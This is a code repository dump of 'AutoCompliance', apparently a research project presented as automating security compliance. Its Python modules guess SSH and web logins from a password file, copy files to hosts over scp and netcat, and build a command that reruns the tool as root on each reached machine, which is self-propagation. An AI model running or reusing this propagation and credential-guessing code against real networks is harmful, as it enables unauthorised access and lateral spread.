96 | :param ip: IP of the machine we're checking for a file for
97 | :param port: Port on which we which to check the machine
98 | :param username: Username to use as part of checking the file
99 | :param password: Password being used as part of checking the file
100 | :return check_over_ssh(ip, port, username, password):
101 | """
102 | propagator = net_propagation.NetPropagation(username, password, ip,
103 | port, None, None, None)
104 | return propagator.check_over_ssh(self.filename)
105 |
106 | def transfer_file(self, ip, port, login_string):
107 | """
108 | This function will transfer a given file if the end user has provided
109 | the appropriate argument, and only when machine login details are found
110 | :param ip: The IP address to which the file should be transferred
111 | for SSH. It handles the transfer of this file differently depending on
112 | whether the port value given is an SSH port
113 | :param port: The port over which the file should be transferred
114 | :param login_string: The username and password needed for the transfer
115 | of the file over the given service
116 | :return True: The transfer of the file is a success
117 | :return False: The transfer of the file is unsuccessful
118 | """
119 | login_string_split = login_string.split(strings.COLON)
120 | try:
121 | print(strings.RSA_AND_PROMPT)
122 | subprocess.call(strings_functions.scp_command_string(
123 | port, login_string_split[0], ip, self.filename), shell=True)
124 | return True
125 | except ConnectionRefusedError:
126 | return False
127 |
128 | def validate_file_exists(self):
129 | """
130 | This function checks if a file exists given a set filename and if it
131 | doesn't we alert the user with an error, show the help screen and exit
132 | gracefully
133 | """
134 | if not os.path.exists(self.filename):
135 | logging.error(strings.FILE_DOES_NOT_EXIST)
136 | demo_functions.exit_and_show_instructions()
137 |
--------------------------------------------------------------------------------
/autocompliance/src/demo_functions.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Author: @andrewk10
4 |
5 | # Importing argparse for command-line option parsing
6 | import argparse
7 | # Importing file for file based functionality
8 | import autocompliance.src.file as file
9 | # Importing logging to safely log sensitive, error or debug info.
10 | import logging
11 | # Importing strings for use of the external strings resources.
12 | import autocompliance.src.strings as strings
13 | # Importing strings_functions for string building functions.
14 | import autocompliance.src.strings_functions as strings_functions
15 |
16 |
17 | class DemoFunctions:
18 | """
19 | This class houses the functionality that is used exclusively for demo
20 | purposes.
21 | """
22 |
23 | def __init__(self, arguments):
24 | """
25 | Object parameters being initialised
26 | :param arguments: User defined arguments
27 | """
28 | self.arguments = arguments
29 |
30 | def assigning_values(self):
31 | """
32 | This method will read in the target ports, target username and
33 | passwords filename from the user and if the user specified an ip
34 | addresses file it will read that and return it alongside all the other
35 | values
36 | :return ip_list: The list of IP addresses contained in the given file
37 | :return target_ports: The selection of ports to target
38 | :return target_username: The username that will be used for actions
39 | :return passwords_filename: The filename of the passwords file
40 | :return None: If an error occurs
41 | """
42 | # Out of scope initialisation for return later.
43 | ip_list = None
44 | if self.arguments.target:
45 | ip_addresses_filename = self.arguments.target
46 | ip_address_file = file.File(ip_addresses_filename)
47 | ip_list = ip_address_file.convert_file_to_list()
48 | else:
49 | logging.debug(strings.IP_FILENAME_NOT_FOUND)
50 |
51 | if self.arguments.pw_file:
52 | return ip_list, self.arguments.ports, self.arguments.username, \
53 | self.arguments.pw_file
54 |
55 | logging.error(strings.FILE_DOES_NOT_EXIST)
56 | return None
57 |
58 | def checking_arguments(self):
59 | """
60 | This method checks if the arguments are appropriately given and if
61 | they're not it calls the help function and gracefully exits. There's
62 | also a check for the help argument itself. It'll try to assign the \
63 | values if the proper arguments are given, and they're valid
64 | :return values[0]: List of IP addresses
65 | :return values[1]: Ports and subsequently services to target
66 | :return values[2]: Username to target
67 | :return values[3]: Filename for a file containing passwords
68 | :return None: If the values can't be assigned.
69 | """
70 | if (self.arguments.target or self.arguments.lan) and \
71 | self.arguments.ports and self.arguments.username:
72 | try:
73 | values = self.assigning_values()
74 | if values is not None and not self.arguments.lan:
75 | return values[0], values[1], values[2], values[3]
76 | if values is not None and self.arguments.lan:
77 | return strings.SPACE, values[1], values[2], values[3]
78 | logging.error(strings.FAILED_ASSIGNING_VALUES)
79 | return None
80 | except RuntimeError:
81 | logging.error(strings.FAILED_ASSIGNING_VALUES)
82 | return None
83 | else:
84 | logging.error(strings.PARAMETER_MISUSE)
85 | return None
86 |
87 |
88 | def parse_arguments(arguments):
89 | """
90 | This function will parse arguments and is even used to dummy arguments for
91 | tests when needed
92 | :param arguments: The arguments to be parsed
93 | """
94 |
95 | # Argument parser for handling arguments.
96 | parser = argparse.ArgumentParser(description=strings.DESCRIPTION)
97 | # Adding the target file option to the parser.
98 | parser.add_argument(
99 | strings.IP_FILE_OPT_SHORT, strings.IP_FILE_OPT_LONG,
100 | dest='target', help=strings.IP_FILE_HELP, type=str)
101 | # Adding the username option to the parser.
102 | parser.add_argument(
103 | strings.USERNAME_OPT_SHORT, strings.USERNAME_OPT_LONG,
104 | dest='username', help=strings.USERNAME_HELP, type=str)
105 | # Adding the password file option to the parser.
106 | parser.add_argument(
107 | strings.PW_FILE_OPT_SHORT, strings.PW_FILE_OPT_LONG,
108 | dest="pw_file", help=strings.PW_FILE_HELP, type=str)
109 | # Adding the port option to the parser.
110 | parser.add_argument(
111 | strings.PORT_OPT_SHORT, strings.PORT_OPT_LONG,
112 | dest='ports', help=strings.PORT_HELP, type=str)
113 | # Adding the lan option to the parser.
114 | parser.add_argument(
115 | strings.LAN_OPT_SHORT, strings.LAN_OPT_LONG, action='store_true',
116 | help=strings.LAN_HELP)
117 | # Adding the propagate option to the parser.
118 | parser.add_argument(
119 | strings.PROP_OPT_SHORT, strings.PROP_OPT_LONG, action='store_true',
120 | help=strings.PROP_HELP)
121 | # Adding the transfer file option to the parser.
122 | parser.add_argument(
123 | strings.PROP_FILE_OPT_SHORT, strings.PROP_FILE_OPT_LONG,
124 | dest='propagate_file', help=strings.PROP_FILE_HELP, type=str)
125 |
126 | # Parsing the arguments.
127 | arguments = parser.parse_args(arguments)
128 | return arguments
129 |
130 |
131 | def exit_and_show_instructions():
132 | """
133 | This function will print the help screen and show an exit prompt.
134 | """
135 | print(strings_functions.help_output())
136 | print(strings.EXITING)
137 |
138 |
139 | def remove_duplicates_in_list(list_with_duplicates):
140 | """
141 | This function simply removes duplicate entries in a given list
142 | :param list_with_duplicates: A list with duplicate entries
143 | :return deduplicated_list: A list without duplicate entries
144 | """
145 | deduplicated_list = list()
146 | for ip in list_with_duplicates:
147 | if ip not in deduplicated_list:
148 | deduplicated_list.append(ip)
149 | return deduplicated_list
150 |
--------------------------------------------------------------------------------
/docs/research/proposal/index.md:
--------------------------------------------------------------------------------
1 | [Research](../index.md) /
2 | # Proposal
3 | This project takes a pre-existing cyber-enabled domain, be it a personal home,
4 | factory, office space etc. and configures all the devices within the immediate
5 | area to the highest standards of defence in respect to cybersecurity. This
6 | takes a lot of the leg-work out of cybersecurity implementations and research
7 | for particular organisations and individuals. It does this through the use of
8 | Distributed Ledger Technologies (DLTs) for storing relevant cyber information
9 | which is then used to inform machine learning processes that seek relevant
10 | governance, risk management and compliance frameworks, guides and laws for that
11 | particular business and then goes about configuring the devices to the
12 | standards set out by these frameworks, guides and laws. To do this, it supports
13 | a multitude of custom scripts and pre-existing tools to cover as many use-cases
14 | as possible.
15 |
16 | Cybersecurity governance is needed now more than ever, especially in a post
17 | COVID-19 world. As more and more people have begun to work from home on remote
18 | IT infrastructure, many vulnerabilities and weaknesses within the realm of
19 | cybersecurity have arisen or greatly expanded in direct correlation to this
20 | opening up of our digital freedoms. As Rodrigo Mariano Díaz (consultant for the
21 | UN ECLAC) puts it, COVID-19 is; "becoming a catalyst of digital transformation,
22 | as well as accelerating human beings’ adaptability to new forms of work. With
23 | its arrival, as well as the urgency of information and news distribution,
24 | COVID-19-related phishing and ransomware attacks increased exponentially,
25 | becoming a catalyst of digital transformation, as well as accelerating human
26 | beings’ adaptability to new forms of work. With its arrival, as well as the
27 | urgency of information and news distribution, COVID-19-related phishing and
28 | ransomware attacks increased
29 | exponentially[1](bibliography/index.md)". See the Fig. 1 below to
30 | gain insight on what this growth looks like.
31 |
32 | 
33 | FIGURE 1: World Cyberattacks since the Appearance of COVID-19 (In Number of
34 | Weekly Attacks)[1](bibliography/index.md)
35 |
36 | With the rise in a need for cybersecurity comes the need for
37 | cybersecurity governance, but many industries and nations may find themselves
38 | struggling to comply with current governance standards. Enter cybersecurity
39 | governance frameworks which are effective outlines of how to achieve
40 | cybersecurity governance targets. One of the objectives for this project
41 | is to seek any relevant cybersecurity governance frameworks for a given
42 | organisation and automate the application of these frameworks to the
43 | organisation's domain.
44 |
45 | This rise in need for cybersecurity governance goes hand in hand with risk
46 | management, as sacrifices in cybersecurity implementations inherently come with
47 | elements of risk. Sometimes, within an organisation, sacrifices like this must
48 | be made. Inversely, a minor cybersecurity implementation may lead to a major
49 | deferral in risk. It's important to gauge and optimise your cybersecurity
50 | decision-making around this relationship and for this, risk management
51 | frameworks are more than useful. This project looks to automate the
52 | decision-making process and establishment of an organisation's relevant risk
53 | management frameworks.
54 |
55 | All of this is to be explored with a select few dummy organisations with the
56 | goal of creating a more general purpose implementation. As with any kind of
57 | industry, there are coinciding industry regulations at play. Adherence to these
58 | regulations will be done using any relevant compliance frameworks for the
59 | given organisation's industry sector.
60 |
61 | This project seeks to automatically examine any relevant cybersecurity
62 | governance frameworks, risk management frameworks and industry regulations and
63 | will form a layout of the organisation's cybersecurity GRC Requirements as well
64 | as an automated implementation approach henceforth known as the tool
65 | "AutoCompliance".
66 |
67 | ## Research Area
68 | Zero trust security for endpoints and clients alongside security automation are
69 | the core research areas of the project. Machine learning is to be used for the
70 | formation of organisation profiles. This project takes a look at how to
71 | automate the implementation of a programme of cybersecurity governance,
72 | risk management and compliance in any given organisation through the use of
73 | Distributed Ledger Technologies. Governance, Compliance and regulatory
74 | frameworks as well as numerous laws will be researched. These include but are
75 | not limited to; NIST, OSSTMM, PMMM, PMBoK, COBIT, ISO/IEC 27014:2020, National
76 | Cyber Security Strategy - Government of Ireland, NIST RMF, ISO/IEC 27005:2018,
77 | CMMC,GDPR, PCI DSS, ENISA Strategy, AT-101 (SOC2), ISO 9001:2015 and ISO/IEC
78 | 27001:-2013.
79 |
80 | ### Project Goals
81 | - Investigate how far one can minimise human involvement in the cybersecurity
82 | governance, risk management and compliance space. The process is often
83 | laborious and resource intensive for an organisation.
84 | - Work towards reducing liability or human error for any given organisation in
85 | regard to implementing a GRC programme. Peace of mind as it were.
86 | - Experiment with the utilisation of distributed ledger technologies in an
87 | ecologically friendly, efficient and reasonable manner to inform the machine
88 | learning processes mentioned below. DLTs and their effect on the environment is
89 | a heavily discussed topic at the moment and advancements made here could lead
90 | to further environmentally friendly practices in the space.
91 | - See if implementing machine learning to help process specific organisation
92 | GRC requirements automatically and dynamically. No two organisations are the
93 | same when it comes to GRC requirements and this must be accounted for.
94 | - Try to find the necessary tools and technologies that meet these
95 | aforementioned GRC requirements. Malware scanning, firewall rules, port
96 | management to name a few could all be manipulated to suit particular GRC
97 | requirements.
98 | - Attempt to ease the process of internal and external auditing in regard to
99 | GRC for any given organisation through automated report and design documenting
100 | as a result of a successful/unsuccessful GRC implementation. Leave a paper
101 | trail at every step of the implementation of a GRC programme.
102 |
103 | ### Research Question & Deliverables
104 | - Can DLTs help implement a GRC programme better than other means?
105 | - A comparison report of DLT performance compared to the conventional means
106 | for implementing a GRC programme.
107 | - DLT solution(s) that assist with the implementation of a GRC programme in
108 | any given organisation.
109 | - Is there anything that can't or should not be automated in the
110 | implementation? Why?
111 | - A breakdown on all items that can not be automated with in depth technical
112 | analysis as to why that is the case.
113 | - Are existing implementation solutions suitable or is there more work to be
114 | done?
115 | - A definition on what is to be classified as "suitable".
116 | - An outline of all that needs to be done to reach a suitable state.
117 | - What possible future technical developments need to be accounted for in the
118 | GRC space?
119 | - A list of future technical areas and a description on how they should be
120 | accounted for in the future.
121 | - Is machine learning the best way towards total zero trust security solutions?
122 | - A comparison report of ML performance compared to the conventional means \
123 | for implementing zero trust security in an organisation's network.
124 | - ML solution(s) that assist with the implementation of a zero trust security
125 | network in any given organisation.
126 |
127 | ## Project Resources
128 | - [Mega Cloud Files](https://mega.nz/folder/GgpV3QJT#12NyyoDLzVzn425jrK8EOQ)
129 | - [GitHub](https://github.com/andrewk10/AutoCompliance)
130 | - [Meeting Notes and Outstanding Items](https://docs.google.com/document/d/1gxrai-zpmATkwgbDc8EFp_WIKIwZ2ojA_dCE4tvENAk/edit?usp=sharing)
--------------------------------------------------------------------------------
/autocompliance/data/icons/hicolor/scalable/apps/org.example.App.svg:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/autocompliance/src/test_net_propagation.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Author: @andrewk10
4 |
5 | # Importing demo_functions for demo specific functionality.
6 | import autocompliance.src.demo_functions as demo_functions
7 | # Importing file for file based functionality
8 | import autocompliance.src.file as file
9 | # Importing logging to log the ping command fails
10 | import logging
11 | # Importing net_propagation for testing
12 | import autocompliance.src.net_propagation as net_propagation
13 | # Importing strings for common string resources
14 | import autocompliance.src.strings as strings
15 | # Importing subprocess to run the ping command where needed
16 | import subprocess
17 |
18 | # Uncomment this test if needed. Warning, it's very slow.
19 | # def test_additional_actions():
20 | # """
21 | # This function tests the additional_actions function in the net_propagation
22 | # script. Currently, the function only calls two other functions, so this
23 | # test uses the bad path in both to run through once. Good paths will be
24 | # tested in the two functions own tests eventually
25 | # """
26 | # propagator = net_propagation.NetPropagation(
27 | # strings.RANDOM_STRING, None, strings.TEST_IP, None, None, None, None)
28 | # transfer_file = file.File(strings.RANDOM_STRING)
29 | # propagation_script = file.File(strings.RANDOM_STRING)
30 | #
31 | # # Parsing and hard-coding necessary arguments
32 | # arguments = demo_functions.parse_arguments([
33 | # strings.IP_FILE_OPT_SHORT, strings.IP_LIST_SHORT,
34 | # strings.PORT_OPT_SHORT, strings.ALL_PORTS, strings.USERNAME_OPT_SHORT,
35 | # strings.ADMIN, strings.PW_FILE_OPT_SHORT, strings.PWDS_LIST_SHORT,
36 | # strings.PROP_FILE_OPT_SHORT, strings.FILE])
37 | #
38 | # # arguments.target = strings.IP_LIST_SHORT
39 | # # arguments.ports = strings.ALL_PORTS
40 | # # arguments.username = strings.ADMIN
41 | # # arguments.password_file = strings.PWDS_LIST_SHORT
42 | # # arguments.propagate_file = strings.FILE
43 | # ports = [strings.SSH_PORT, strings.WEB_PORT_EIGHTY]
44 | # for port in ports:
45 | # propagator.port = port
46 | # propagator.additional_actions(transfer_file, propagation_script,
47 | # arguments)
48 |
49 |
50 | def test_check_over_ssh():
51 | """
52 | This function tests the check_check_over_ssh function, only tests the bad
53 | path for now
54 | """
55 | test_file = file.File(strings.FILE)
56 | propagator = net_propagation.NetPropagation(
57 | strings.ADMIN, strings.ADMIN, strings.TEST_IP, strings.SSH_PORT, None,
58 | None, None)
59 | assert propagator.check_over_ssh(test_file.filename) is True
60 |
61 |
62 | def test_connect_ssh_client():
63 | """
64 | This function tests the connect_ssh_client function, only tests the bad
65 | path for now
66 | """
67 | propagator = net_propagation.NetPropagation(
68 | strings.ADMIN, strings.ADMIN, strings.TEST_IP, strings.SSH_PORT, None,
69 | None, None)
70 | assert propagator.connect_ssh_client() is False
71 |
72 |
73 | def test_connect_web():
74 | """
75 | This function tests the connect_web function, only tests the bad path for
76 | now
77 | """
78 | propagator = net_propagation.NetPropagation(
79 | strings.ADMIN, strings.ADMIN, strings.TEST_IP, strings.WEB_PORT_EIGHTY,
80 | None, None, None)
81 | assert propagator.connect_web() is False
82 |
83 |
84 | def test_cycle_through_subnet():
85 | """
86 | This function tests the cycle_through_subnet function
87 | """
88 | propagator = net_propagation.NetPropagation(
89 | strings.ADMIN, strings.ADMIN, strings.TEST_IP, strings.SSH_PORT,
90 | strings.LOOPBACK, strings.LOOPBACK_IP_AS_LIST, None)
91 | propagator.cycle_through_subnet()
92 | assert propagator.ip_list == strings.TEST_IP_LIST
93 |
94 |
95 | def test_gathering_local_ips():
96 | """
97 | This function tests the gathering_local_ips function which is going to have
98 | a different result no matter what machine it runs on, hence no assertion
99 | since no assumption can be made
100 | """
101 | propagator = net_propagation.NetPropagation(
102 | strings.ADMIN, strings.ADMIN, strings.TEST_IP, strings.SSH_PORT,
103 | strings.LOOPBACK, strings.LOOPBACK_IP_AS_LIST, None)
104 | propagator.gathering_local_ips()
105 |
106 |
107 | def test_is_reachable_ip():
108 | """
109 | This function tests the is_ip_reachable function good and bad paths, good
110 | path by using the default loopback IP address and the bad path by using a
111 | reserved local IP address.
112 | """
113 | try:
114 | # Need to do a quick test ping to ensure the ping command is actually
115 | # available, this is being done on the test level as this test assumes
116 | # ping is in fact available.
117 | command = [strings.PING, strings.PING_ARGUMENT, strings.ONE, str(
118 | strings.LOOPBACK_IP)]
119 | subprocess.call(command)
120 | propagator = net_propagation.NetPropagation(
121 | strings.ADMIN, strings.ADMIN, strings.LOOPBACK_IP,
122 | strings.SSH_PORT,
123 | strings.LOOPBACK, strings.LOOPBACK_IP_AS_LIST, None)
124 | assert propagator.is_reachable_ip() is True
125 | propagator.ip = strings.TEST_IP_FAIL
126 | assert propagator.is_reachable_ip() is False
127 | except FileNotFoundError:
128 | # If ping isn't available, no worries, we handle it
129 | logging.debug(strings.PING_CMD_NOT_FOUND)
130 |
131 |
132 | def test_propagate_script():
133 | """
134 | This function tests the propagate_script function but only the bad path.
135 | """
136 | propagator = net_propagation.NetPropagation(
137 | strings.ADMIN, strings.ADMIN, strings.LOOPBACK_IP, strings.SSH_PORT,
138 | strings.LOOPBACK, strings.LOOPBACK_IP_AS_LIST, None)
139 | assert propagator.propagate_script(file.File(strings.FILE)) is False
140 |
141 |
142 | def test_propagating():
143 | """
144 | This function tests the propagating function but only the bad path.
145 | """
146 | propagator = net_propagation.NetPropagation(
147 | strings.ADMIN, strings.ADMIN, strings.LOOPBACK_IP, strings.SSH_PORT,
148 | strings.LOOPBACK, strings.LOOPBACK_IP_AS_LIST, None)
149 |
150 | # Parsing the arguments and hard-coding necessary arguments
151 | arguments = demo_functions.parse_arguments([
152 | strings.IP_FILE_OPT_SHORT, strings.IP_LIST_SHORT,
153 | strings.PORT_OPT_SHORT, strings.ALL_PORTS, strings.USERNAME_OPT_SHORT,
154 | strings.ADMIN, strings.PW_FILE_OPT_SHORT, strings.PWDS_LIST_SHORT,
155 | strings.PROP_FILE_OPT_SHORT, strings.FILE, strings.PROP_OPT_SHORT])
156 |
157 | propagator.propagating(file.File(strings.FILE), arguments)
158 |
159 |
160 | def test_remove_unreachable_ips():
161 | """
162 | This function tests the remove_unreachable_ips function but only the bad
163 | path.
164 | """
165 | try:
166 | # Need to do a quick test ping to ensure the ping command is actually
167 | # available, this is being done on the test level as this test assumes
168 | # ping is in fact available.
169 | command = [strings.PING, strings.PING_ARGUMENT, strings.ONE, str(
170 | strings.LOOPBACK_IP)]
171 | subprocess.call(command)
172 | propagator = net_propagation.NetPropagation(
173 | strings.ADMIN, strings.ADMIN, strings.LOOPBACK_IP,
174 | strings.SSH_PORT, strings.LOOPBACK,
175 | strings.LOOPBACK_AND_FAIL_IP_AS_LIST, None)
176 | propagator.remove_unreachable_ips()
177 | # Weird quirk, can't use LOOPBACK_IP_AS_LIST here if
178 | # test_cycle_through_subnet or gathering_local_ips is used.
179 | assert propagator.ip_list == strings.LOOPBACK_IP_AS_LIST_REMOVE
180 | except FileNotFoundError:
181 | # If ping isn't available, no worries, we handle it
182 | logging.debug(strings.PING_CMD_NOT_FOUND)
183 |
184 |
185 | def test_scan_port():
186 | """
187 | This function tests the scan port function
188 | """
189 | # Good path
190 | propagator = net_propagation.NetPropagation(
191 | None, None, strings.LOOPBACK_IP, strings.SSH_PORT, None, None, None)
192 | assert not propagator.scan_port()
193 | # Bad Path
194 | propagator = net_propagation.NetPropagation(
195 | None, None, None, None, None, None, None)
196 | assert not propagator.scan_port()
197 |
198 |
199 | def test_try_password_for_function():
200 | """
201 | This function tests the try_password_for_function function
202 | """
203 | # Try SSH first
204 | propagator = net_propagation.NetPropagation(
205 | strings.ADMIN, strings.ADMIN, strings.LOOPBACK_IP, strings.SSH_PORT,
206 | None, None, None)
207 | assert propagator.try_password_for_service() is False
208 |
209 | # Try Web next
210 | propagator.port = strings.WEB_PORT_EIGHTY
211 | assert propagator.try_password_for_service() is False
212 |
213 |
214 | def test_try_sign_in():
215 | """
216 | This function tests the try_sign_in function
217 | """
218 | propagator = net_propagation.NetPropagation(
219 | strings.ADMIN, strings.ADMIN, strings.LOOPBACK_IP, strings.SSH_PORT,
220 | None, None, [strings.ADMIN])
221 | assert propagator.try_sign_in() == (None, strings.SSH_LOWERCASE)
222 |
223 | propagator.port = strings.WEB_PORT_EIGHTY
224 | assert propagator.try_sign_in() == (None, strings.WEB_LOGIN)
225 |
226 | propagator.port = strings.WEB_PORT_EIGHTY_EIGHTY
227 | assert propagator.try_sign_in() == (None, strings.WEB_LOGIN)
228 |
229 | propagator.port = strings.WEB_PORT_EIGHTY_EIGHT_EIGHTY_EIGHT
230 | assert propagator.try_sign_in() == (None, strings.WEB_LOGIN)
231 |
--------------------------------------------------------------------------------
/autocompliance/src/strings_functions.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Author: @andrewk10
4 |
5 | # Importing strings for use of the external strings resources.
6 | import autocompliance.src.strings as strings
7 |
8 |
9 | def adding_address_to_interface(specific_address, interface):
10 | """
11 | This function takes a specific address and an interface and generates a
12 | string for declaring it was found in a given subnet
13 | :param specific_address: The specific target address to be added to the
14 | interface
15 | :param interface: The interface on which we're adding a specific target
16 | address
17 | :return "Adding " + str(specific_address) + " from interface "
18 | + str(interface) + "'s subnet.": The string in question
19 | """
20 | return strings.ADDING + strings.SPACE + str(specific_address) + \
21 | strings.SPACE + strings.FROM_INTERFACE + strings.SPACE + \
22 | str(interface) + strings.INTERFACE_SUBNET
23 |
24 |
25 | def cat_file(filename):
26 | """
27 | This function creates a command for concatenating a specific file
28 | :param filename: The filename of the file we want to touch
29 | :return "cat " + filename: The completed cat command
30 | """
31 | return strings.CAT + strings.SPACE + filename
32 |
33 |
34 | def checking_ip_reachable(ip):
35 | """
36 | This function creates a string that describes the availability of a machine
37 | on a specific IP address
38 | :param ip: The specific IP address
39 | :return "Checking if the following ip address is reachable: " + str(ip):
40 | The string in question
41 | """
42 | return strings.IS_IP_REACHABLE + strings.SPACE + str(ip)
43 |
44 |
45 | def connection_status(service, ip, port, status):
46 | """
47 | This function creates the connection status string dependent
48 | on the context given by the arguments passed into it.
49 | """
50 | return str(status) + strings.SPACE + str(service) + strings.SPACE + \
51 | strings.LOGIN_TO + strings.SPACE + str(ip) + strings.COLON + \
52 | str(port) + strings.SPACE + strings.USERNAME_IN_PWS
53 |
54 |
55 | def fetching_ips_for_interface(interface):
56 | """
57 | This function generates the string for fetching the IPs for a specific
58 | interface
59 | :param interface: The interface we're fetching IPs on
60 | :return "Fetching IPs for interface " + str(interface) + "...": The string
61 | in question
62 | """
63 | return strings.FETCHING_INTERFACE_IPS + strings.SPACE + str(interface) + \
64 | strings.ELLIPSES
65 |
66 |
67 | def file_present_on_host(ip):
68 | """
69 | This function generates the string for a file already present on a host
70 | :param ip: The host itself
71 | :return "A file is already present on this host: " + str(ip): The string
72 | in question
73 | """
74 | return strings.FILE_PRESENT_ON_HOST + strings.SPACE + str(ip)
75 |
76 |
77 | def filename_processing_error(filename):
78 | """
79 | A processing error printout for a specific filename.
80 | :param filename: The filename of the file we're struggling to process
81 | combination
82 | :return: The string itself
83 | """
84 | return strings.FILENAME_PROCESSING_ERROR + strings.COLON + \
85 | strings.SPACE + filename
86 |
87 |
88 | def help_output():
89 | """
90 | This is the help output for when the user passes in the help parameter
91 | :return: The output itself.
92 | """
93 | return strings.PARAMETERS + strings.NEWLINE_TAB + \
94 | strings.IP_FILE_OPT_SHORT + strings.SPACE + \
95 | strings.ARROW + strings.SPACE + strings.FILENAME_LIST_IP_ADDRESSES + \
96 | strings.NEWLINE_TAB + strings.PORT_OPT_SHORT + strings.SPACE + \
97 | strings.ARROW + strings.SPACE + strings.PORTS_TO_SCAN + \
98 | strings.NEWLINE_TAB + strings.USERNAME_OPT_SHORT + strings.SPACE + \
99 | strings.ARROW + strings.SPACE + strings.A_USERNAME + \
100 | strings.NEWLINE_TAB + strings.PW_FILE_OPT_SHORT + strings.SPACE + \
101 | strings.ARROW + strings.SPACE + strings.FILENAME_PWS_FILE + \
102 | strings.NEWLINE_TAB + strings.LAN_OPT_SHORT + \
103 | strings.SPACE + strings.ARROW + strings.SPACE + \
104 | strings.LOCAL_SCAN_STRING_HELP + strings.NEWLINE_TAB + \
105 | strings.PROP_OPT_SHORT + strings.SPACE + strings.ARROW + \
106 | strings.SPACE + strings.HELP_STRING_PROPAGATION + strings.NEWLINE + \
107 | strings.EXAMPLE_USAGE + strings.NEWLINE_TAB + strings.MAIN_SCRIPT + \
108 | strings.SPACE + strings.IP_FILE_OPT_SHORT + \
109 | strings.SPACE + strings.IP_LIST + strings.SPACE + \
110 | strings.PORT_OPT_SHORT + strings.SPACE + strings.ALL_PORTS + \
111 | strings.SPACE + strings.USERNAME_OPT_SHORT + strings.SPACE + \
112 | strings.ADMIN + strings.SPACE + strings.PW_FILE_OPT_SHORT + \
113 | strings.SPACE + strings.PWDS_LIST + strings.NEWLINE_NEWLINE_TAB + \
114 | strings.MAIN_SCRIPT + strings.IP_FILE_OPT_SHORT + \
115 | strings.SPACE + strings.IP_LIST + strings.SPACE + \
116 | strings.PORT_OPT_SHORT + strings.SPACE + strings.SSH_PORT + \
117 | strings.SPACE + strings.USERNAME_OPT_SHORT + strings.SPACE + \
118 | strings.ROOT + strings.SPACE + strings.PW_FILE_OPT_SHORT + \
119 | strings.SPACE + strings.PWDS_LIST
120 |
121 |
122 | def ip_list_not_read(filename):
123 | """
124 | This function returns the error for an ip list that can't be generated from
125 | a particular filename
126 | :param filename: The filename of the file that can't have an ip list
127 | derived from it
128 | :return: The string in question
129 | """
130 | return strings.CAN_NOT_READ_IP_LIST + strings.SPACE + filename
131 |
132 |
133 | def ip_reachability(ip, reachable):
134 | """
135 | This function generates the string regarding the reachability of an IP i.e.
136 | whether it can be pinged
137 | :param ip: The IP being pinged
138 | :param reachable: Whether it is reachable
139 | :return str(ip) + " was reachable.": String returned if it is reachable
140 | :return str(ip) + " was not reachable.": String returned if it is not
141 | reachable
142 | """
143 | if reachable:
144 | return str(ip) + strings.SPACE + strings.WAS_REACHABLE + \
145 | strings.FULL_STOP
146 | return str(ip) + strings.SPACE + strings.WAS_NOT_REACHABLE + \
147 | strings.FULL_STOP
148 |
149 |
150 | def netcat_listener(port, filename):
151 | """
152 | This function will create a netcat listener on the device we have a netcat
153 | link to
154 | :param port: The port on which the netcat listener will operate
155 | :param filename: The filename of the file we're moving using the listener
156 | parameter
157 | :return: The string in question
158 | """
159 | return strings.NETCAT_LISTENER_PORT_COMMAND + strings.SPACE + str(port) + \
160 | strings.SPACE + strings.GREATER_THAN + strings.SPACE + filename
161 |
162 |
163 | def netcat_writer(ip, port, filename):
164 | """
165 | This function will create a netcat writer to write a file to a device we
166 | have a netcat link to
167 | :param ip: Machine with the netcat listener we are writing to
168 | :param port: The port on which the netcat writer will operate
169 | :param filename: The filename of the file we're moving using the writer
170 | parameter
171 | :return: The string in question
172 | """
173 | return strings.NETCAT_WRITER_COMMAND + strings.SPACE + str(ip) + \
174 | strings.SPACE + str(port) + strings.SPACE + strings.LESS_THAN + \
175 | strings.SPACE + filename
176 |
177 |
178 | def run_script_command():
179 | """
180 | This function will run the propagation script on another target machine
181 | over any service
182 | :return: The command itself
183 | """
184 | return strings.MAIN_SCRIPT + strings.SPACE + \
185 | strings.LAN_OPT_SHORT + strings.SPACE + \
186 | strings.PORT_OPT_SHORT + strings.SPACE + strings.SSH_PORT + \
187 | strings.SPACE + strings.USERNAME_OPT_SHORT + strings.SPACE + \
188 | strings.ROOT + strings.SPACE + strings.PW_FILE_OPT_SHORT + \
189 | strings.PWDS_LIST + strings.SPACE + strings.PROP_OPT_SHORT
190 |
191 |
192 | def scp_command_string(port, username, target_ip, filename):
193 | """
194 | This function creates and SSH copy string for an OS command
195 | :param port: Port over which we are running the SSH copy
196 | :param username: The username for the SSH login
197 | :param target_ip: The IP address of the machine we are copying too
198 | :param filename: The name of the file to be copied across by SSH
199 | :return: The SSH copy command
200 | """
201 | return strings.SCP_COMMAND + strings.SPACE + str(port) + strings.SPACE + \
202 | filename + strings.SPACE + username + strings.AT_SYMBOL + target_ip + \
203 | strings.HOME_DIR
204 |
205 |
206 | def touch_file(filename):
207 | """
208 | This function creates a command for touching a specific file
209 | :param filename: The filename of the file we want to touch
210 | :return: The completed touch command
211 | """
212 | return strings.TOUCH_COMMAND + strings.SPACE + filename
213 |
214 |
215 | def web_login_url(ip, port):
216 | """
217 | This function will build the web login url string
218 | :param ip: The IP of the machine running the web service
219 | :param port: The port the web service is running on
220 | :return: The string itself
221 | """
222 | return strings.HTTPS_STRING + ip + strings.COLON + port + strings.LOGIN_PHP
223 |
224 |
225 | def working_username_password(service):
226 | """
227 | This function will build a string for a working username and password given
228 | a specific service
229 | :param service: Service for which there is a working username and password
230 | combination
231 | :return: The string itself
232 | """
233 | return strings.WORKING_USERNAME_PASS + strings.SPACE + str(service) + \
234 | strings.SPACE + strings.WAS_FOUND
235 |
--------------------------------------------------------------------------------
/autocompliance/src/net_propagation.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 |
3 | # Author: @andrewk10
4 |
5 | # Importing paramiko modules for SSH connection and exception handling.
6 | from paramiko import SSHClient, RejectPolicy
7 | from paramiko.ssh_exception import NoValidConnectionsError, SSHException
8 | # Importing modules from scapy for Packet Crafting and Sending / Sniffing.
9 | from scapy.all import get_if_addr
10 | from scapy.interfaces import get_if_list
11 | from scapy.layers.inet import IP, TCP
12 | from scapy.sendrecv import sr
13 | from scapy.utils import subprocess, os
